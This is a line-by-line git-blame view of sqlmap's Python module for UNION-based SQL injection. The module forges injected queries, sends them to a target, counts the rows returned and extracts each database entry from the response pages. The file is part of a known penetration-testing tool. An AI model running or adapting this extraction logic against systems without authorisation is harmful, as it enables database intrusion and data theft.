2008-10-15 19:38:22 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
2008-10-15 19:56:32 +04:00
|
|
|
$Id$
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-10-14 18:41:14 +04:00
|
|
|
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
2010-10-15 03:18:29 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
|
2008-12-10 20:23:07 +03:00
|
|
|
import re
|
2008-10-15 19:38:22 +04:00
|
|
|
import time
|
|
|
|
|
|
|
|
from lib.core.agent import agent
|
2011-01-28 19:36:09 +03:00
|
|
|
from lib.core.common import Backend
|
2011-01-31 15:41:39 +03:00
|
|
|
from lib.core.common import calculateDeltaSeconds
|
2011-03-17 11:54:20 +03:00
|
|
|
from lib.core.common import extractRegexResult
|
2011-02-24 19:52:46 +03:00
|
|
|
from lib.core.common import filterStringValue
|
2010-06-02 16:45:40 +04:00
|
|
|
from lib.core.common import getUnicode
|
2011-01-12 01:18:47 +03:00
|
|
|
from lib.core.common import initTechnique
|
2011-01-19 02:02:11 +03:00
|
|
|
from lib.core.common import isNumPosStrValue
|
2011-01-31 15:41:39 +03:00
|
|
|
from lib.core.common import listToStrValue
|
2008-12-10 20:23:07 +03:00
|
|
|
from lib.core.common import parseUnionPage
|
2011-02-25 12:22:44 +03:00
|
|
|
from lib.core.common import removeReflectiveValues
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
2008-12-10 20:23:07 +03:00
|
|
|
from lib.core.data import queries
|
2010-11-08 12:20:02 +03:00
|
|
|
from lib.core.enums import DBMS
|
2011-01-12 01:18:47 +03:00
|
|
|
from lib.core.enums import PAYLOAD
|
2011-01-14 12:45:47 +03:00
|
|
|
from lib.core.exception import sqlmapSyntaxException
|
2011-01-19 02:02:11 +03:00
|
|
|
from lib.core.settings import FROM_TABLE
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.unescaper import unescaper
|
|
|
|
from lib.request.connect import Connect as Request
|
2008-12-10 20:23:07 +03:00
|
|
|
from lib.utils.resume import resume
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
reqCount = 0
|
2008-12-10 20:23:07 +03:00
|
|
|
|
2011-02-07 01:32:44 +03:00
|
|
|
def __oneShotUnionUse(expression, unpack=True):
|
2011-02-02 01:07:42 +03:00
|
|
|
global reqCount
|
|
|
|
|
2011-03-17 11:54:20 +03:00
|
|
|
check = "(?P<result>%s.*%s)" % (kb.misc.start, kb.misc.stop)
|
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
# Prepare expression with delimiters
|
2011-02-07 01:32:44 +03:00
|
|
|
expression = agent.concatQuery(expression, unpack)
|
|
|
|
expression = unescaper.unescape(expression)
|
2011-02-02 01:07:42 +03:00
|
|
|
|
|
|
|
if conf.limitStart or conf.limitStop:
|
2011-02-02 16:34:09 +03:00
|
|
|
where = PAYLOAD.WHERE.NEGATIVE
|
2011-02-02 01:07:42 +03:00
|
|
|
else:
|
|
|
|
where = None
|
|
|
|
|
|
|
|
# Forge the inband SQL injection request
|
|
|
|
vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
|
|
|
|
query = agent.forgeInbandQuery(expression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5])
|
|
|
|
payload = agent.payload(newValue=query, where=where)
|
|
|
|
|
|
|
|
# Perform the request
|
|
|
|
page, headers = Request.queryPage(payload, content=True, raise404=False)
|
2011-02-24 19:52:46 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
reqCount += 1
|
|
|
|
|
2011-03-17 11:54:20 +03:00
|
|
|
# Parse the returned page to get the exact union-based
|
2011-02-02 01:07:42 +03:00
|
|
|
# sql injection output
|
2011-03-17 11:54:20 +03:00
|
|
|
output = extractRegexResult(check, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE) \
|
|
|
|
or extractRegexResult(check, removeReflectiveValues(listToStrValue(headers.headers \
|
|
|
|
if headers else None), payload), re.DOTALL | re.IGNORECASE)
|
2011-02-02 01:07:42 +03:00
|
|
|
|
2011-03-22 15:21:56 +03:00
|
|
|
if output:
|
|
|
|
output = getUnicode(output, kb.pageEncoding)
|
2011-03-22 12:22:48 +03:00
|
|
|
|
2011-03-17 11:54:20 +03:00
|
|
|
return output
|
2011-02-02 01:07:42 +03:00
|
|
|
|
2011-01-20 01:48:06 +03:00
|
|
|
def configUnion(char=None, columns=None):
|
|
|
|
def __configUnionChar(char):
|
|
|
|
if char.isdigit() or char == "NULL":
|
|
|
|
conf.uChar = char
|
|
|
|
elif not char.startswith("'") or not char.endswith("'"):
|
|
|
|
conf.uChar = "'%s'" % char
|
2011-01-18 01:57:33 +03:00
|
|
|
|
2011-01-20 01:48:06 +03:00
|
|
|
def __configUnionCols(columns):
|
|
|
|
if "-" not in columns or len(columns.split("-")) != 2:
|
|
|
|
raise sqlmapSyntaxException, "--union-cols must be a range with hyphon (e.g. 1-10)"
|
2011-01-18 01:57:33 +03:00
|
|
|
|
2011-01-20 01:48:06 +03:00
|
|
|
columns = columns.replace(" ", "")
|
2011-01-25 16:04:13 +03:00
|
|
|
colsStart, colsStop = columns.split("-")
|
2011-01-18 01:57:33 +03:00
|
|
|
|
2011-01-25 16:04:13 +03:00
|
|
|
if not colsStart.isdigit() or not colsStop.isdigit():
|
2011-01-20 01:48:06 +03:00
|
|
|
raise sqlmapSyntaxException, "--union-cols must be a range of integers"
|
2011-01-18 01:57:33 +03:00
|
|
|
|
2011-01-25 16:04:13 +03:00
|
|
|
conf.uColsStart = int(colsStart)
|
|
|
|
conf.uColsStop = int(colsStop)
|
2011-01-18 01:57:33 +03:00
|
|
|
|
2011-01-20 01:48:06 +03:00
|
|
|
if conf.uColsStart > conf.uColsStop:
|
|
|
|
errMsg = "--union-cols range has to be from lower to "
|
|
|
|
errMsg += "higher number of columns"
|
|
|
|
raise sqlmapSyntaxException, errMsg
|
2011-01-18 01:57:33 +03:00
|
|
|
|
|
|
|
if isinstance(conf.uChar, basestring):
|
|
|
|
__configUnionChar(conf.uChar)
|
|
|
|
elif isinstance(char, basestring):
|
|
|
|
__configUnionChar(char)
|
|
|
|
|
|
|
|
if isinstance(conf.uCols, basestring):
|
|
|
|
__configUnionCols(conf.uCols)
|
|
|
|
elif isinstance(columns, basestring):
|
|
|
|
__configUnionCols(columns)
|
|
|
|
|
2011-02-07 01:32:44 +03:00
|
|
|
def unionUse(expression, unpack=True, dump=False):
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
This function tests for an inband SQL injection on the target
|
|
|
|
url then call its subsidiary function to effectively perform an
|
|
|
|
inband SQL injection on the affected url
|
|
|
|
"""
|
|
|
|
|
2011-01-12 01:18:47 +03:00
|
|
|
initTechnique(PAYLOAD.TECHNIQUE.UNION)
|
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
global reqCount
|
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
count = None
|
|
|
|
origExpr = expression
|
2008-12-10 20:23:07 +03:00
|
|
|
startLimit = 0
|
2011-01-19 02:02:11 +03:00
|
|
|
stopLimit = None
|
|
|
|
test = True
|
|
|
|
value = ""
|
2011-02-02 01:07:42 +03:00
|
|
|
reqCount = 0
|
|
|
|
start = time.time()
|
2008-12-10 20:23:07 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr)
|
2008-12-10 20:23:07 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
# We have to check if the SQL query might return multiple entries
|
|
|
|
# and in such case forge the SQL limiting the query output one
|
|
|
|
# entry per time
|
|
|
|
# NOTE: I assume that only queries that get data from a table can
|
|
|
|
# return multiple entries
|
2011-02-02 16:34:09 +03:00
|
|
|
if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \
|
2011-02-02 01:07:42 +03:00
|
|
|
(dump and (conf.limitStart or conf.limitStop))) and \
|
|
|
|
" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \
|
|
|
|
not in FROM_TABLE) or (Backend.getIdentifiedDbms() in FROM_TABLE \
|
|
|
|
and not expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]))) \
|
2011-03-22 15:37:05 +03:00
|
|
|
and "EXISTS(" not in expression.upper() and "COUNT(*)" not in expression.upper() \
|
|
|
|
and "(CASE" not in expression.upper():
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
|
|
|
|
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
|
|
|
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
|
|
|
limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
|
|
|
|
limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
|
2008-12-10 20:23:07 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
if limitGroupStart.isdigit():
|
|
|
|
startLimit = int(limitRegExp.group(int(limitGroupStart)))
|
2008-12-10 20:23:07 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
stopLimit = limitRegExp.group(int(limitGroupStop))
|
|
|
|
limitCond = int(stopLimit) > 1
|
|
|
|
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
|
|
|
if limitRegExp:
|
2011-01-28 19:36:09 +03:00
|
|
|
limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
|
|
|
|
limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
|
2008-12-10 20:23:07 +03:00
|
|
|
|
|
|
|
if limitGroupStart.isdigit():
|
|
|
|
startLimit = int(limitRegExp.group(int(limitGroupStart)))
|
|
|
|
|
|
|
|
stopLimit = limitRegExp.group(int(limitGroupStop))
|
|
|
|
limitCond = int(stopLimit) > 1
|
2011-02-25 12:22:44 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
elif topLimit:
|
|
|
|
startLimit = 0
|
|
|
|
stopLimit = int(topLimit.group(1))
|
|
|
|
limitCond = int(stopLimit) > 1
|
2008-12-10 20:23:07 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
|
|
|
|
limitCond = False
|
|
|
|
else:
|
|
|
|
limitCond = True
|
2011-01-19 02:02:11 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
# I assume that only queries NOT containing a "LIMIT #, 1"
|
|
|
|
# (or similar depending on the back-end DBMS) can return
|
|
|
|
# multiple entries
|
|
|
|
if limitCond:
|
|
|
|
if limitRegExp:
|
|
|
|
stopLimit = int(stopLimit)
|
2011-01-06 12:48:04 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
# From now on we need only the expression until the " LIMIT "
|
|
|
|
# (or similar, depending on the back-end DBMS) word
|
|
|
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
|
|
|
stopLimit += startLimit
|
|
|
|
untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
|
|
|
|
expression = expression[:untilLimitChar]
|
2008-12-10 20:23:07 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
|
|
|
stopLimit += startLimit
|
|
|
|
elif dump:
|
|
|
|
if conf.limitStart:
|
|
|
|
startLimit = conf.limitStart
|
|
|
|
if conf.limitStop:
|
|
|
|
stopLimit = conf.limitStop
|
|
|
|
|
|
|
|
# Count the number of SQL query entries output
|
2011-03-11 19:03:19 +03:00
|
|
|
countedExpression = expression.replace(expressionFields, "COUNT(*)", 1)
|
2011-02-02 01:07:42 +03:00
|
|
|
|
|
|
|
if re.search(" ORDER BY ", expression, re.I):
|
|
|
|
untilOrderChar = countedExpression.index(" ORDER BY ")
|
|
|
|
countedExpression = countedExpression[:untilOrderChar]
|
|
|
|
|
|
|
|
count = resume(countedExpression, None)
|
|
|
|
count = parseUnionPage(count, countedExpression)
|
|
|
|
|
|
|
|
if not count or not count.isdigit():
|
2011-02-07 01:32:44 +03:00
|
|
|
output = __oneShotUnionUse(countedExpression, unpack)
|
2011-02-02 01:07:42 +03:00
|
|
|
|
|
|
|
if output:
|
|
|
|
count = parseUnionPage(output, countedExpression)
|
|
|
|
|
|
|
|
if (not count or (count.isdigit() and int(count) == 0)):
|
|
|
|
warnMsg = "it was not possible to count the number "
|
|
|
|
warnMsg += "of entries for the used SQL query. "
|
|
|
|
warnMsg += "sqlmap will assume that it returns only "
|
|
|
|
warnMsg += "one entry"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
stopLimit = 1
|
2011-02-25 12:22:44 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
elif isNumPosStrValue(count):
|
|
|
|
if isinstance(stopLimit, int) and stopLimit > 0:
|
|
|
|
stopLimit = min(int(count), int(stopLimit))
|
|
|
|
else:
|
|
|
|
stopLimit = int(count)
|
|
|
|
|
|
|
|
infoMsg = "the SQL query used returns "
|
|
|
|
infoMsg += "%d entries" % stopLimit
|
|
|
|
logger.info(infoMsg)
|
2011-02-25 12:22:44 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
try:
|
|
|
|
for num in xrange(startLimit, stopLimit):
|
|
|
|
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
|
|
|
field = expressionFieldsList[0]
|
|
|
|
elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
|
|
|
|
field = expressionFieldsList
|
|
|
|
else:
|
|
|
|
field = None
|
2008-12-10 20:23:07 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
limitedExpr = agent.limitQuery(num, expression, field)
|
|
|
|
output = resume(limitedExpr, None)
|
2008-12-10 20:23:07 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
if not output:
|
2011-02-07 01:32:44 +03:00
|
|
|
output = __oneShotUnionUse(limitedExpr, unpack)
|
2011-01-31 15:41:39 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
if output:
|
|
|
|
value += output
|
|
|
|
parseUnionPage(output, limitedExpr)
|
2008-12-10 20:23:07 +03:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
except KeyboardInterrupt:
|
|
|
|
print
|
|
|
|
warnMsg = "Ctrl+C detected in dumping phase"
|
|
|
|
logger.warn(warnMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
if not value:
|
2011-02-07 01:32:44 +03:00
|
|
|
value = __oneShotUnionUse(expression, unpack)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
duration = calculateDeltaSeconds(start)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-02-02 01:07:42 +03:00
|
|
|
debugMsg = "performed %d queries in %d seconds" % (reqCount, duration)
|
|
|
|
logger.debug(debugMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
return value
|